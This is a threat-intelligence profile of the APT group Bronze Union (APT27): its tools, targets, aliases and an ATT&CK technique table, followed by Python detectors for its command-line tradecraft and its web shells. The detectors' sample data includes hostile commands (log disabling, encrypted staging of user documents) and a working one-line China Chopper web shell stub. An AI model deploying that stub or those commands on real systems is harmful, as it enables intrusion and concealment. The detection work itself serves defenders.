General description
Bronze Union is an APT group that has been active since at least 2010. Researchers consistently attribute the group to China. For initial access it relies heavily on watering-hole attacks (compromising websites its intended victims visit), as well as phishing and exploitation of vulnerabilities in Internet-facing network services. The group specializes in cyber-espionage, primarily against the networks of government agencies, defense enterprises and political organizations. In 2020, some researchers (including specialists from the PT Expert Security Center) suggested that the group had become financially motivated as well.
Objectives
- Espionage
- Extortion (financial gain)
Tools
- AspxSpy/ASPXTool webshell
- Antak webshell
- China Chopper webshell
- Clambling
- Dnstunclient
- Gh0st RAT
- HTran
- HttpBrowser
- Hunter
- HyperBro
- Mimikatz/Wrapikatz
- NBTscan
- OwaAuth
- PlugX/Korplug
- Polpo
- PsExec
- SysUpdate
- TwoFace
- Windows Credentials Editor
- ZxShell
- gsecdump
- pwdump
Target sectors
- Aerospace industry
- Analytical centers
- Defense industry
- State sector
- Information technologies
- Media
- Education
- Industrial sector
Target countries
- Australia
- United Kingdom
- Vietnam
- Hong Kong
- Israel
- India
- Iran
- Spain
- Canada
- China
- Mongolia
- Russia
- United States
- Taiwan
- Thailand
- Tibet
- Turkey
- Philippines
- South Korea
- Japan
Alternative group names
- LuckyMouse
- Emissary Panda
- APT27
- Iron Tiger
- TG-3390
- TEMP.Hippo
- Group 35
- ZipToken
Reports by Positive Technologies and other researchers
- https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/
- https://arstechnica.com/information-technology/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/
- https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2015/2015.09.17.Operation_Iron_Tiger/wp-operation-iron-tiger.pdf
- https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
- https://www.secureworks.com/research/bronze-union
- https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/
- https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/
- https://securelist.com/luckymouse-hits-national-data-center/86083/
- https://securelist.com/luckymouse-ndisproxy-driver/87914/
- https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox
- https://securelist.com/apt-trends-report-q1-2019/90643/
- https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
- https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/
MITRE ATT&CK techniques used by the group
Technique ID | Technique name | Description |
---|---|---|
Initial Access | ||
T1078 | Valid Accounts | Bronze Union obtained legitimate credentials using various methods and used them for further lateral movement in the victim's networks. |
T1133 | External Remote Services | During the operation, Bronze Union located VPN profiles and used them to reach the network through the victim's external VPN service. The group also obtained OWA credentials during the intrusion and later used them to regain access to the network after its original access was lost. |
T1189 | Drive-by Compromise | Bronze Union widely used strategic web compromises to infect their victims. |
T1190 | Exploit Public-Facing Application | Bronze Union exploited vulnerabilities in Internet-facing services as its main initial infection vector, for example CVE-2019-0604 in Microsoft SharePoint. |
T1195.002 | Supply Chain Compromise: Compromise Software Supply Chain | Bronze Union used infected installers and a compromised Able Desktop update system to spread malware. |
T1199 | Trusted Relationship | For initial access, Bronze Union sent emails from compromised mailboxes of a trusted partner company. |
T1566.001 | Phishing: Spearphishing Attachment | Bronze Union sent targeted phishing emails with decoy attachments. |
Execution | ||
T1047 | Windows Management Instrumentation | Bronze Union used WMI to run malware. |
T1053.002 | Scheduled Task/Job: At (Windows) | Bronze Union used the at command to schedule tasks that executed SFX-RAR archives installing the HttpBrowser or PlugX malware. |
T1059.001 | Command and Scripting Interpreter: PowerShell | Bronze Union used PowerShell to execute commands. |
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Bronze Union used a command interpreter to execute commands. |
T1106 | Native API | Bronze Union can use the CreateProcess and ShellExecute APIs to launch new processes. |
T1203 | Exploitation for Client Execution | Bronze Union exploited CVE-2017-11882 in the Microsoft Office Equation Editor to execute code on victims' workstations. (CVE-2019-0604 in Microsoft SharePoint, which the group also exploited, is a server-side vulnerability and falls under T1190, Exploit Public-Facing Application.) |
T1204.002 | User Execution: Malicious File | The Able Desktop installer infected with Bronze Union malware was launched by the user. |
Persistence | ||
T1505.003 | Server Software Component: Web Shell | Bronze Union used various web shells, including ASPXTool, Antak, and China Chopper. |
T1543.003 | Create or Modify System Process: Windows Service | Bronze Union malware can create a new service with the name specified in the configuration to gain persistence in the system. |
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Bronze Union malware can gain persistence in the system through the registry key Software\Microsoft\Windows\CurrentVersion\Run. |
Privilege Escalation | ||
T1068 | Exploitation for Privilege Escalation | Bronze Union exploited CVE-2014-6324 (MS14-068, Kerberos KDC privilege escalation) to escalate privileges. |
T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | Bronze Union used a public UAC bypass technique to escalate privileges. |
Defense Evasion | ||
T1027 | Obfuscated Files or Information | Bronze Union malware XOR-encrypts its payload, wraps auxiliary code with the shikata_ga_nai encoder, and stores the payload compressed with the LZNT1 algorithm. |
T1055.012 | Process Injection: Process Hollowing | Bronze Union malware can create a svchost.exe process and inject a payload into it. |
T1070.004 | Indicator Removal on Host: File Deletion | Bronze Union deleted existing logs and archives with data from the victim's computers. |
T1070.005 | Indicator Removal on Host: Network Share Connection Removal | Bronze Union disconnected mapped network shares after exfiltrating files from them. |
T1112 | Modify Registry | Bronze Union malware can create a new registry key in HKEY_CURRENT_USER\Software\Classes\. |
T1140 | Deobfuscate/Decode Files or Information | During execution, Bronze Union malware can deobfuscate the auxiliary code encoded using the shikata_ga_nai encoder and uncompress the payload that was compressed using the LZNT1 algorithm. |
T1562.002 | Impair Defenses: Disable Windows Event Logging | Bronze Union used appcmd.exe (the IIS command-line administration tool) to disable logging on the victim's server. |
T1564.001 | Hidden Files and Directories | Bronze Union stored the collected information in hidden directories and files. |
T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | Bronze Union used the DLL search order hijacking technique to execute the payload. |
T1574.002 | Hijack Execution Flow: DLL Side-Loading | Bronze Union used legitimate signed executables vulnerable to DLL side-loading (in particular, components of Kaspersky Lab, Symantec, and ESET products) to load its own DLLs; those DLLs in turn load and run shellcode. |
Credential Access | ||
T1003.001 | OS Credential Dumping: LSASS Memory | Bronze Union used Wrapikatz (a modified version of Mimikatz) to collect credentials, including from domain controllers. |
T1003.002 | OS Credential Dumping: Security Account Manager | Bronze Union used gsecdump to collect credentials, including from domain controllers. |
T1003.004 | OS Credential Dumping: LSA Secrets | Bronze Union used gsecdump to collect credentials, including from domain controllers. |
T1056.003 | Input Capture: Web Portal Capture | Bronze Union installed the code for logging credentials on Microsoft Exchange servers. |
Discovery | ||
T1012 | Query Registry | Bronze Union malware can read and decrypt the values stored in the registry. |
T1016 | System Network Configuration Discovery | Bronze Union used the nbtscan utility to enumerate NetBIOS names and identify systems to target. |
T1018 | Remote System Discovery | Bronze Union used the net view command. |
T1046 | Network Service Scanning | Bronze Union used the Hunter utility to detect vulnerable network services. |
T1049 | System Network Connections Discovery | Bronze Union used the net use command for internal network reconnaissance, as well as quser.exe to determine the active RDP sessions in the victim's system. |
T1082 | System Information Discovery | Bronze Union malware can collect information about the system. |
T1083 | File and Directory Discovery | Bronze Union looked for sensitive documents with the .pdf, .ppt, .xls, and .doc extensions. |
T1087.001 | Account Discovery: Local Account | Bronze Union group used the net user command to obtain a list of accounts. |
T1120 | Peripheral Device Discovery | Bronze Union malware can search for removable disks in the system. |
Lateral Movement | ||
T1021.006 | Remote Services: Windows Remote Management | Bronze Union used WinRM to gain remote access to compromised systems. |
T1210 | Exploitation of Remote Services | Bronze Union exploited the MS17-010 vulnerability to move laterally to other systems on the network. |
Collection | ||
T1005 | Data from Local System | Bronze Union ran a console command to create an archive of files of the types that were of interest to them from the victim's user directories. |
T1056.001 | Input Capture: Keylogging | Bronze Union used the reconnaissance framework SanBox and the corresponding functionality in the LuckyBack malware to capture keystrokes. |
T1074.001 | Data Staged: Local Data Staging | Bronze Union saved encrypted archives locally for further exfiltration. |
T1074.002 | Data Staged: Remote Data Staging | Bronze Union moved encrypted archives to Internet-accessible servers previously compromised using China Chopper for further exfiltration. |
T1113 | Screen Capture | Bronze Union malware can support screen capture. |
T1119 | Automated Collection | Bronze Union ran a console command to create an archive of files of the types that were of interest to them from the victim's user directories. |
T1560.001 | Archive Collected Data: Archive via Utility | Bronze Union used RAR to compress and encrypt files with a password before exfiltrating them. |
Command And Control | ||
T1071.001 | Application Layer Protocol: Web Protocols | Bronze Union malware can use the HTTP protocol to interact with the C2. |
T1090.001 | Proxy: Internal Proxy | Bronze Union malware (Polpo) can act as a proxy. |
T1105 | Ingress Tool Transfer | After re-establishing access to a victim's network, Bronze Union downloaded tools (such as gsecdump and WCE) that it had staged on websites it had previously compromised but not yet used in the intrusion. |
T1132.001 | Data Encoding: Standard Encoding | Bronze Union malware (Polpo) encodes encrypted data using Base64. |
T1573.001 | Encrypted Channel: Symmetric Cryptography | Bronze Union malware (Polpo) encrypts the transmitted data using AES. |
Exfiltration | ||
T1030 | Data Transfer Size Limits | Bronze Union divided the RAR archives for exfiltration into parts. |
T1041 | Exfiltration Over C2 Channel | Bronze Union malware (Polpo) transmits the collected data to the C2 server. |
T1052.001 | Exfiltration Over Physical Medium: Exfiltration over USB | Bronze Union malware (Information Collector) moves files inside the network using removable disks. |
T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | Bronze Union malware (StartServiceTool) uses Dropbox to exfiltrate the collected data. |
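Several rows of the table above describe tradecraft that leaves a recognisable shape in Windows process-creation telemetry: at scheduling a dropped binary (T1053.002), appcmd.exe disabling logging (T1562.002), net use /delete after exfiltration (T1070.005), password-protected RAR archives split into volumes (T1560.001, T1030), quser for RDP sessions (T1049) and nbtscan sweeps (T1016). The following is an added example, not code from the original page or from any of the reports it cites: a small detector that runs such rules over Sysmon Event ID 1 / Security 4688-style records (image path plus command line). The sample records, the rule names and the command-line patterns are constructed for this example and match the shape of the documented behaviour, not indicators taken from an incident.

```python
"""
Added example, not code from the original page or from any report it cites:
a small detector for the command-line tradecraft the ATT&CK table above
attributes to Bronze Union, run over Windows process-creation records
(Sysmon Event ID 1 / Security 4688 style: image path plus command line).
The sample records further down are constructed for this example; the
patterns match the shape of the documented behaviour, not indicators
taken from an incident.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Hit:
    technique: str     # ATT&CK ID from the table above
    rule: str          # name of the matching rule
    command_line: str  # the command line that fired it


# (technique id, rule name, regex on the image basename, regex on the command line)
RULES = [
    # T1053.002: at.exe scheduling a remote job that runs a dropped .exe/.rar (SFX-RAR)
    ("T1053.002", "at_schedules_dropped_binary",
     r"^at\.exe$", r"\b\d{1,2}:\d{2}\b.*\.(exe|rar)\b"),
    # T1562.002: IIS HTTP logging switched off with appcmd.exe
    ("T1562.002", "appcmd_disables_http_logging",
     r"^appcmd\.exe$", r"/section:httpLogging.*?/dontLog:\s*true"),
    # T1070.005: mapped share removed after use
    ("T1070.005", "net_use_delete",
     r"^net1?\.exe$", r"^\S*\s+use\s+\S+\s+/del(ete)?\b"),
    # T1560.001 (+ T1030): password-protected RAR archive split into volumes
    ("T1560.001", "rar_password_volumes",
     r"^rar\.exe$", r"\ba\b.*-h?p\S+.*-v\d+[kmg]?\b"),
    # T1049: quser.exe listing interactive (RDP) sessions; high-volume, tune per estate
    ("T1049", "quser_sessions", r"^quser\.exe$", r".*"),
    # T1016 / T1018: nbtscan sweep of a whole subnet
    ("T1016", "nbtscan_subnet_sweep",
     r"^nbtscan\.exe$", r"\b\d{1,3}(\.\d{1,3}){3}/\d{1,2}\b"),
]
_COMPILED = [(t, n, re.compile(img, re.I), re.compile(cmd, re.I)) for t, n, img, cmd in RULES]


def image_basename(image: str) -> str:
    """Last path component; tolerates both separators in case the log was normalised."""
    return re.split(r"[\\/]", image)[-1]


def detect(records):
    """records: iterable of dicts with Sysmon-style 'Image' and 'CommandLine' keys.
    Returns one Hit per (record, rule) match, in input order."""
    hits = []
    for rec in records:
        name = image_basename(rec.get("Image", ""))
        cmd = rec.get("CommandLine", "")
        for technique, rule, img_re, cmd_re in _COMPILED:
            if img_re.match(name) and cmd_re.search(cmd):
                hits.append(Hit(technique, rule, cmd))
    return hits


# Constructed sample log: six records shaped like the documented tradecraft, four benign.
SAMPLE_RECORDS = [
    {"Image": r"C:\Windows\System32\at.exe",
     "CommandLine": r"at.exe \\10.0.0.7 23:00 cmd /c C:\Windows\Temp\update.exe"},
    {"Image": r"C:\Windows\System32\inetsrv\appcmd.exe",
     "CommandLine": r'appcmd.exe set config "Default Web Site" /section:httpLogging /dontLog:True'},
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use \\10.0.0.5\c$ /delete"},
    {"Image": r"C:\Windows\Temp\rar.exe",
     "CommandLine": r"rar.exe a -r -hpS3cret -v100m C:\Windows\Temp\d.rar C:\Users\alice\Documents\*.doc"},
    {"Image": r"C:\Windows\System32\quser.exe",
     "CommandLine": r"quser.exe /server:10.0.0.7"},
    {"Image": r"C:\Windows\Temp\nbtscan.exe",
     "CommandLine": r"nbtscan.exe -r 10.0.0.0/24"},
    {"Image": r"C:\Windows\System32\svchost.exe", "CommandLine": r"svchost.exe -k netsvcs"},
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use \\fileserver\share /persistent:yes"},
    {"Image": r"C:\Program Files\WinRAR\rar.exe", "CommandLine": r"rar.exe x backup.rar"},
    {"Image": r"C:\Windows\System32\at.exe", "CommandLine": r"at.exe"},
]


def techniques_seen(records=SAMPLE_RECORDS):
    """Sorted, de-duplicated technique IDs observed in the records."""
    return sorted({h.technique for h in detect(records)})


if __name__ == "__main__":
    for h in detect(SAMPLE_RECORDS):
        print(f"{h.technique:10} {h.rule:30} {h.command_line}")
```

The rules are deliberately tied to the image name as well as the command line, so a renamed copy of rar.exe or nbtscan.exe (which the group is known to drop into temporary directories) would slip past them; in production, pair these with hashes or original-filename fields from the PE version resource. The quser rule is a plain "any execution" match and will be noisy on jump hosts, so scope it to servers where interactive session enumeration is unexpected.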
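The Tools list and the T1505.003 row name three web shell families (China Chopper, ASPXSpy/ASPXTool, Antak) that the group drops on Internet-facing IIS servers and later reuses as staging points (T1074.002). The following is an added example, not code from the original page or from any of the reports it cites: content heuristics for hunting those families across an IIS web root. The sample pages are constructed for this example; the China Chopper pattern is the widely published one-line ASPX client stub, while the other two rules are family-level heuristics (a page that names itself ASPXSpy/ASPXTool, and an ASPX page that imports the PowerShell automation namespace the way Antak-style shells do), not signatures taken from a vendor report.

```python
"""
Added example, not code from the original page or any report it cites: content
heuristics for hunting the web shell families named in the Tools list (T1505.003
in the table above) across an IIS web root. The sample pages below are
constructed for this example. The China Chopper pattern is the widely published
one-line ASPX client stub; the other two rules are family-level heuristics,
not signatures taken from a vendor report.
"""
import os
import re

WEBSHELL_RULES = {
    # China Chopper ASPX stub: eval() of a request parameter with the "unsafe" flag.
    "china_chopper_aspx": re.compile(
        r'eval\s*\(\s*Request\.Item\s*\[\s*"[^"]*"\s*\]\s*,\s*"unsafe"\s*\)', re.I),
    # ASPXSpy / ASPXTool: a large menu-driven shell that carries its own name in the page.
    "aspxspy_family": re.compile(r"\bASPXSpy\b|\bASPXTool\b", re.I),
    # Antak-style shell: an ASPX page that hosts a PowerShell runspace in-process.
    "powershell_runspace_in_aspx": re.compile(
        r'Import\s+Namespace\s*=\s*"System\.Management\.Automation', re.I),
}
WEB_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".ascx", ".asp"}


def classify(content: str) -> list:
    """Names of all rules matching one file's text, in rule order (empty list if clean)."""
    return [name for name, rx in WEBSHELL_RULES.items() if rx.search(content)]


def scan_webroot(root: str):
    """Walk a web root and yield (path, [rule names]) for every flagged server-side page."""
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            names = classify(text)
            if names:
                yield path, names


# Constructed sample pages (file name -> contents); not real files from an incident.
SAMPLE_FILES = {
    "error.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "tools.aspx": '<%@ Page Language="C#" %><html><head><title>ASPXSpy</title></head></html>',
    "shell.aspx": ('<%@ Page Language="C#" %>\n'
                   '<%@ Import Namespace="System.Management.Automation" %>\n'
                   '<script runat="server">/* runs a PowerShell runspace */</script>'),
    "default.aspx": '<%@ Page Language="C#" %><html><body>Hello</body></html>',
}


def sample_results():
    """file name -> list of matched rule names, for the constructed samples."""
    return {fn: classify(text) for fn, text in SAMPLE_FILES.items()}


if __name__ == "__main__":
    for fn, names in sample_results().items():
        print(f"{fn:14} {names or 'clean'}")
```

Run `scan_webroot(r"C:\inetpub\wwwroot")` (or the Exchange and SharePoint virtual directories, which are where the reports above place the group's shells) on a live server. Because the group also plants OwaAuth-style credential loggers on Exchange (T1056.003), compare the flagged set against a known-good file inventory of the web root rather than trusting the heuristics alone; an obfuscated or renamed shell will not match any of these three patterns.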